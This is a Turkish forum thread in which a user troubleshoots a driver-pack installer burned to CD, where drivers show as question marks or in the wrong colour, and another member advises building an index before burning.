Kendi makinamda tüm driverler kurulu olduğundan mı acaba driverleri güncelleme yapamıyor yada kurmuyor ya da driver bilgisi vermiyor.

Bendeki rus versiyonunda direk renkleri turuncu çıkıyor .Yani eksik birşeymi yaptım ? Yüklenmemiş driverlerimin turuncu,yüklü olanlarında yeşil çıkması için ne yapmam gerekiyor ?

Öncelikle çalışma için teşekkür ederim.

Bir sorum var:

Ben sadece programın kendisini indirdim ve indirdiğim driverleride drp dizinine atıp direk cd ye yazdırdım.Şimdi cd yi takınca orda hiç driver çıkmıyor.Listele diyorum tüm driverler çıkıyor fakat hepsi soru işareti.Güncelle dediğimde de hiçbirşey olmuyor.

Kendi makinamda tüm driverler kurulu olduğundan mı acaba driverleri güncelleme yapamıyor yada kurmuyor ya da driver bilgisi vermiyor.

Bendeki rus versiyonunda direk renkleri turuncu çıkıyor .Yani eksik birşeymi yaptım ? Yüklenmemiş driverlerimin turuncu,yüklü olanlarında yeşil çıkması için ne yapmam gerekiyor ?

Arkadaş gayet güzel hazırlamış konuyu. İlk mesajı tekrar oku güzelce. Indeks hazırlaman gerekiyor cd'ye yazmadan önce. Lan paketinde sıkıntı çıkıyor birtek diğerleri gayet güzel çalışıyor.

Archived

This topic is now archived and is closed to further replies.

• Recently Browsing   0 members

No registered users viewing this page.

• Create New...